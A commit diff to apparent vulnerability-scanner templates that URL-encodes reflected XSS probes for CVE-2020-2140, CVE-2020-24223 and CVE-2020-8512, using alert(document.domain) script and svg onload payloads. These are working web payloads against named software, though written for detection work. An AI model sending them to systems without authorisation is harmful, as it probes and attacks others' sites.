Fix encoding for XSS payloads

Prevent false positives encoding the xss payloads, and remove from the match data that was not injected.
2020-09-04 00:55:13 -05:00 · 2020-09-04 00:55:13 -05:00 · 07d10d6e50
parent 9ef6f7f029
commit 07d10d6e50
3 changed files with 6 additions and 6 deletions
--- a/cves/CVE-2020-2140.yaml
+++ b/cves/CVE-2020-2140.yaml
@ -10,8 +10,8 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample"
-      - "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample"
+      - "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
+      - "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"

    matchers-condition: and
    matchers:
--- a/cves/CVE-2020-24223.yaml
+++ b/cves/CVE-2020-24223.yaml
@ -12,7 +12,7 @@ info:
 requests:
  - metod: GET
    path:
-      - '{{BaseURL}}/contact.php?theme=tes"><script>alert(document.domain)</script>'
+      - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
    matchers-condition: and
    matchers:
      - type: status
--- a/cves/CVE-2020-8512.yaml
+++ b/cves/CVE-2020-8512.yaml
@ -12,13 +12,13 @@ info:
 requests:
  - method: GET
    path:
-      - '{{BaseURL}}/webmail/?color="><svg/onload=alert(document.domain)>"'
-      - '{{BaseURL}}:32000/webmail/?color="><svg/onload=alert(document.domain)>"'
+      - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
+      - '{{BaseURL}}:32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "<svg/onload=alert(document.domain)>\"\">"
+          - "<svg/onload=alert(document.domain)>"
        part: body
      - type: status
        status: